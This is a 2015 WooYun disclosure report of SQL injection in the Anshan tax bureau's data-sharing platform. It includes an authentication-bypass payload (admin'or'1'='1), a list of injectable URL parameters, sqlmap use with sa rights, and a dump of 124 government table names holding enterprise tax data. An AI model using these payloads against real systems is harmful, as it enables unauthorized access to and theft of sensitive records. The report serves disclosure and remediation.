当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137648

漏洞标题:辽宁鞍山税务局某站存在sql注入(已入后台+泄露数万企业税务信息)

相关厂商:辽宁鞍山市税务局

漏洞作者: zsmj

提交时间:2015-08-30 17:46

修复时间:2015-10-17 10:46

公开时间:2015-10-17 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-30: 细节已通知厂商并且等待厂商处理中
2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

果然鞍钢的税务占鞍山市的税务的一大半啊!!!

详细说明:

1、鞍山市税收征管保障平台后台登陆存在注入,可万能密码登陆

http://**.**.**.**/web/login.aspx


用户名admin'or'1'='1  密码:1


成功登陆后发现为总系统管理员,权限很大很大

4.jpg


2、在鞍山市保障部门下发的各单位的信息总汇中,有大量敏感信息泄露(1个月万多条信息)

3.jpg


1.jpg


2.jpg


3、在用户管理中,系统管理员可任意重置各县区领导小组53位管理者的密码

6.jpg


4、在管理后台存在大量注入,未对参数进行过滤,直接上图

5.jpg

7.jpg


随便找一个链接

http://**.**.**.**/web/121_1.aspx?tt=1&dbname=国税局_国税局个体户达起征点认定信息表&xq=全部县区&startdate=2015-08-01&enddate=2015-08-28&inf_status=有效&pro_status=全部状态


其中,dbname ,xq ,startdate 等全是注入点
放sqlmap跑一下
sa权限

sql2.jpg


sql1.jpg


Database: asds                                                                 
[124 tables]
+----------+
| w_config |
| 交通委_鞍山市交通运输局营运证发放统计表 |
| 交通委_鞍山市交通运输工程信息表 |
| 人力资源社会保障局_保险参保人缴费人失业人员及医疗保险应缴社保费核定信息 |
| 人力资源社会保障局_鞍山人力资源和社会保障险局药店医保消费额信息表 |
| 住房城乡建设委_住房和城乡建设委工程信息表 |
| 住房城乡建设委_住房和城乡建设委建筑工程拆迁许可信息表 |
| 住房城乡建设委_住房和城乡建设委建筑工程施工许可信息表 |
| 住房城乡建设委_住房和城乡建设委建筑工程竣工验收备案情况表 |
| 住房城乡建设委_住房和城乡建设委房地产开发企业资质审批情况表 |
| 住房城乡建设委_城市综合管理信息传递表 |
| 住房城乡建设委_城建工程信息传递表 |
| 住房城乡建设委_工程项目招标投标信息传递表 |
| 住房城乡建设委_房产局预销售许可证发放情况表 |
| 住房城乡建设委_房产管理信息传递表 |
| 住房城乡建设委_房屋产权交易中心涉税信息传递表 |
| 体育局_商业性体育活动信息传递表 |
| 体育局_营业性体育健身和培训机构场所审批信息 |
| 信息传递 |
| 信息传递汇总_临时表 |
| 信息作废列表 |
| 信息反馈 |
| 信息反馈情况表汇总A |
| 信息反馈情况表汇总B |
| 信息反馈情况表汇总C |
| 信息反馈情况表汇总D_temp |
| 信息反馈情况表汇总D_temp |
| 信息反馈情况表汇总E |
| 信息反馈情况表汇总F |
| 信息反馈情况表汇总G |
| 信息反馈情况表汇总H1 |
| 信息反馈情况表汇总H1 |
| 信息反馈统计表_temp |
| 信息类别 |
| 信息重置列表 |
| 公共资源交易管理局_公共资源交易信息传递表 |
| 公安局_公安局采矿业炸药使用量审批信息传递表 |
| 公安局_鞍山市公安局旅店入住率信息统计表 |
| 公安局_鞍山市公安局机动车驾驶证发放机动车注册登记信息统计表 |
| 公安局_鞍山市机动车注册登记信息 |
| 农委_鞍山市农业专项补助粮食储备补助及农村土地承包信息表 |
| 农委_鞍山市种子生产经营许可证信息表 |
| 卫生计生委_医疗机构设置审批变更注销以及营利性和非营利性医疗机构统计表 |
| 县区列表 |
| 参数列表 |
| 友情链接 |
| 发展改革委_公益性收费经营服务性收费行政事业性收费服务性收费信息 |
| 发展改革委_国民经济运行情况分析 |
| 发展改革委_经济适用住房价格信息 |
| 发展改革委_鞍山市发展和改革委重大项目立项信息传递表 |
| 国土资源局_上年度新增采矿权明细资料 |
| 国土资源局_政府收回国有土地使用权信息 |
| 国土资源局_特定纳税人占用荒山证明材料 |
| 国土资源局_矿产资源补偿费征收数量金额 |
| 国土资源局_鞍山市国土资源局农用地转用和土地征收信息表 |
| 国土资源局_鞍山市国土资源局国有建设用地使用权转让地块成交信息表 |
| 国土资源局_鞍山市国土资源局土地整理工程信息表 |
| 国土资源局_鞍山市国土资源局矿产资源变更涉税信息传递表 |
| 国土资源局_鞍山市国土资源局矿产资源开采涉税信息传递表 |
| 国税局_个体工商户停歇业信息 |
| 国税局_国税入库增值税消费税信息传递表 |
| 国税局_国税局个体户达起征点认定信息表 |
| 国税局_国税局稽查查补信息传递表 |
| 国税局_新办变更注销非正常户纳税人信息传递表 |
| 国资委_鞍山市人民政府国有资产监督管理委员会管辖的国有企业兼并划转转让改组改制信息传递表 |
| 图片新闻 |
| 外经贸局_境外单位或个人向本市有关企业或个人转让商标权专利权情况 |
| 外经贸局_对外贸易外商投资和经济技术合作信息 |
| 外经贸局_走出去企业在境外投资经营情况 |
| 外经贸局_鞍山市对外贸易经济合作局企业外贸经营权信息传递表 |
| 外经贸局_鞍山市对外贸易经济合作局外商投资信息传递表 |
| 审计局_被审计单位有关涉税的违法情况等信息传递表 |
| 工商局_户外广告登记信息传递表 |
| 工商局_鞍山市工商局企业股东变更信息传递表 |
| 所属系统 |
| 报送周期 |
| 政策法规 |
| 教育局_办学许可证核准信息表 |
| 教育局_教育系统收取赞助费捐赠费及普通高中学校收取的择校费表 |
| 数据比对 |
| 数据比对规则 |
| 文化广电新闻出版局_大型营业性演出及其他文化娱乐活动举办信息传递表 |
| 文化广电新闻出版局_文体局网吧文化经营许可证核准信息表 |
| 旅游发展委_旅游局旅游项目建设信息传递表 |
| 旅游发展委_鞍山市旅游局旅行社设立审批信息传递表 |
| 日志列表 |
| 更改县区列表 |
| 服务业委_每年报废汽车数量车型信息 |
| 林业局_特定纳税人占有林地证明材料 |
| 林业局_鞍山市征收占用林地信息传递表 |
| 检查通报 |
| 残联_鞍山市残联残疾人证发放信息表 |
| 民政局_安置残疾人就业企业名单 |
| 民政局_鞍山市民政部门新增变更和注销社会团体福利企业民办非企业单位及其他单位情况表 |
| 水利局_水务局水利建设项目传递表 |
| 沟通反馈 |
| 环保局_环保建设工程信息传递表 |
| 科技局_科技局专利技术转让涉税信息传递表 |
| 科技局_科技局高新技术企业认定涉税信息传递表 |
| 空表 |
| 粮食局_国有粮食企业名单信息 |
| 经济和信息化委_全市规模以上工业企业经济运行情况分析 |
| 经济和信息化委_鞍山市经委工业企业技术改造项目信息表 |
| 统计局_鞍山市统计局信息传递表固定资产投资 |
| 统计局_鞍山市统计局规模以上工业统计信息传递表 |
| 联合管控 |
| 菜单列表 |
| 表格模板_temp |
| 表格模板_temp |
| 规划局_建设工程规划许可证发证统计表 |
| 规划局_建设用地规划许可证发证统计表 |
| 角色列表 |
| 财政局_上年度城建资金预算编制情况和上年度城建资金决算情况 |
| 财政局_企业取得财政性资金项目情况信息表 |
| 财政局_财政对企业基本建设投资情况信息表 |
| 财政局_财政性专项用途资金拨付文件及该项资金的资金管理办法或具体管理要求 |
| 账号列表 |
| 账号类别 |
| 质量技术监督局_鞍山市质量技术监督局组织机构代码信息传递表 |
| 通知公告 |
| 错误列表 |
| 鞍山海关_在鞍山海关通关的企业进出口报告数据信息 |
| 鞍山钢铁集团公司_鞍钢集团建设工程信息传递表 |
| 食品药品监管局_医疗器械经营单位信息

漏洞证明:

如上

修复方案:

过滤

版权声明:转载请注明来源 zsmj@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-02 10:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给辽宁分中心,由其后续协调网站管理单位处置。

最新状态:

暂无